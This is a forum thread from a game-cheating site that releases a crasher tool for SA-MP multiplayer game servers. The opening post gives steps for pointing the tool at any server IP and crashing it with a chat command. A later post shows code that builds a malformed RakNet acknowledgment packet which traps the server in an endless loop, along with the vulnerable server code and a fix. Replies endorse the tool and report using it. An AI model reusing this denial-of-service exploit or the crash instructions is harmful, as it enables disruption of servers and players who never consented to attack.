SAMP Server Crasher 0.3x-R2

**//\\//etwork3r** · 01-06-2014

Made by bartekdvd.
How to use:
Open RakSAMPClient.xml and find this line

Code:

<server nickname="Kwazii" password="">ip.theotherside.pl:7777</server>

Now change the ip.theotherside.pl:7777 to server ip you want to crash.Save and run RakSAMPClient.exe
join to the server and type !freeze
Boom server has been crashed.
Enjoy and go play MTA is much better

Scan:

Code:

https://www.virustotal.com/pl/file/c9127ab00b2720d494ac87edc02389abd6a2796a65ab29839e35787b065603ff/analysis/1389032411/

**AdyTza** · 01-06-2014

Most of the servers fixed this,but yeah..

**Bernard** · 01-06-2014

SAMP Server Crasher_mpgh.net.rar - Jotti's malware scan

#Approved

**xLoLeRxx** · 01-10-2014

Haha, thanks for this, i will use it, but unfortunately it will be working on private or shit public servers only. All large projects have fixed this.

**base187** · 01-16-2014

Seems interesting. Does anyone know what exploit this uses?

**//\\//etwork3r** · 01-17-2014

Originally Posted by base187

Seems interesting. Does anyone know what exploit this uses?

Code:

/*
by bartekdvd
*/
/*
I don't know if it affects the newest version of raknet, but the loop condition is pretty much the same in all versions.
*/
/*
The problem lays in raknet acknowledgment packet system.
Creating RakNet datagram for ack packet in the way like this one bleow traps one of the server threads (raknet thread) into an endless loop.
*/

bitStream->Write(true); //is acknowledgment packet
unsigned short count = 2; 
bitStream->WriteCompressed(count); //how many
for (int i = 0; i < count; i++)
{
	bitStream->Write(false); //is min==max
	bitStream->Write((unsigned short)0); //min index
	bitStream->Write((unsigned short)0xFFFF); //max index
}

/*
This is the place where server thread is trapped
*/

ReliabilityLayer::HandleSocketReceiveFromConnectedPlayer
//...
DataStructures::RangeList<MessageNumberType> incomingAcks;
socketData.Read(hasAcks);
if (hasAcks)
{
	MessageNumberType messageNumber;
	if (incomingAcks.Deserialize(&socketData)==false)
		return false;

	for (i=0; i<incomingAcks.ranges.Size();i++)
	{
		if (incomingAcks.ranges[i].minIndex>incomingAcks.ranges[i].maxIndex)
		{
			RakAssert(incomingAcks.ranges[i].minIndex<=incomingAcks.ranges[i].maxIndex);
			return false;
		}

		for (messageNumber=incomingAcks.ranges[i].minIndex; messageNumber >= incomingAcks.ranges[i].minIndex && messageNumber <= incomingAcks.ranges[i].maxIndex; messageNumber++)
		{	
//		...
//		!!!HERE!!!
//		...
		}

/*
You can now see that the condition:
*/
messageNumber >= incomingAcks.ranges[i].minIndex && messageNumber <= incomingAcks.ranges[i].maxIndex
/*
in this case is incorrect for because the type of messageNumber is unsigned short, so for following values minIndex = 0 and maxIndex = 0xFFFF
the condition is always true.
*/
/*
Solution
*/
/*
The easiest solution is to change the type of messageNumber to unsigned integer or to whatever that can store more data than unsigned short.
*/

**yanirlu** · 01-19-2014

how can i block this in my server ?

**NeuTronas** · 01-20-2014

I need this too

**mdlqer147** · 01-22-2014

ty man it works

Thread: SAMP Server Crasher 0.3x-R2

Thread Tools

Display

SAMP Server Crasher 0.3x-R2

The Following 97 Users Say Thank You to //\\//etwork3r For This Useful Post:

The Following User Says Thank You to //\\//etwork3r For This Useful Post:

Similar Threads

[Request] SAMP Server Crasher!!!

Let's talk Server Crasher

[Release] Battlefield 2 - Name/Rank Changer - Server Crasher

[Help] Private server Crasher

Need some help with moparscape server crashers